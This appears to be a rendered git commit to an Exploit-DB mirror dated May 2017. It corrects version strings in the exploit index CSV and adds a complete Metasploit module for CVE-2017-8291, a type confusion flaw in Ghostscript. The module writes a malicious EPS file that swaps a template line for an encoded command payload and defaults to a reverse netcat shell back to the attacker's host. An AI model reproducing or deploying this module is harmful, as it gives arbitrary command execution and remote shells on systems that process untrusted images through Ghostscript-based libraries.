DB: 2017-05-03
1 new exploits MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow MySQL < 5.6.35 / < 5.7.17 - Integer Overflow Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit) Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection
This commit is contained in:
parent
4aa75d9fe9
commit
6515e26356
2 changed files with 78 additions and 2 deletions
|
@ -5481,7 +5481,7 @@ id,file,description,date,author,platform,type,port
|
|||
41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
|
||||
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
|
||||
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
|
||||
41954,platforms/multiple/dos/41954.py,"MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
|
||||
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -8966,6 +8966,7 @@ id,file,description,date,author,platform,type,port
|
|||
41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0
|
||||
41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
|
||||
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
|
||||
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -37803,4 +37804,4 @@ id,file,description,date,author,platform,type,port
|
|||
41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
|
||||
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
|
||||
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
|
||||
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
|
||||
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
75
platforms/linux/local/41955.rb
Executable file
75
platforms/linux/local/41955.rb
Executable file
|
@ -0,0 +1,75 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a type confusion vulnerability in Ghostscript that can
|
||||
be exploited to obtain arbitrary command execution. This vulnerability affects
|
||||
Ghostscript version 9.21 and earlier and can be exploited through libraries
|
||||
such as ImageMagick and Pillow.
|
||||
},
|
||||
'Author' => [
|
||||
'Atlassian Security Team', # Vulnerability discovery
|
||||
'hdm' # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
%w{CVE 2017-8291},
|
||||
%w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
|
||||
%w{URL http://seclists.org/oss-sec/2017/q2/148},
|
||||
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
|
||||
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
|
||||
],
|
||||
'DisclosureDate' => 'Apr 27 2017',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' => {
|
||||
'BadChars' => "\x22\x27\x5c)(", # ", ', \, (, and )
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'generic netcat bash-tcp'
|
||||
}
|
||||
},
|
||||
'Targets' => [
|
||||
['EPS file', template: 'msf.eps']
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_netcat',
|
||||
'LHOST' => Rex::Socket.source_address,
|
||||
'DisablePayloadHandler' => false,
|
||||
'WfsDelay' => 9001
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
|
||||
])
|
||||
end
|
||||
|
||||
# Example usage from the bug tracker:
|
||||
# $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps
|
||||
|
||||
def exploit
|
||||
file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
|
||||
end
|
||||
|
||||
def template
|
||||
::File.read(File.join(
|
||||
Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
|
||||
target[:template]
|
||||
))
|
||||
end
|
||||
|
||||
end
|
Loading…
Add table
Reference in a new issue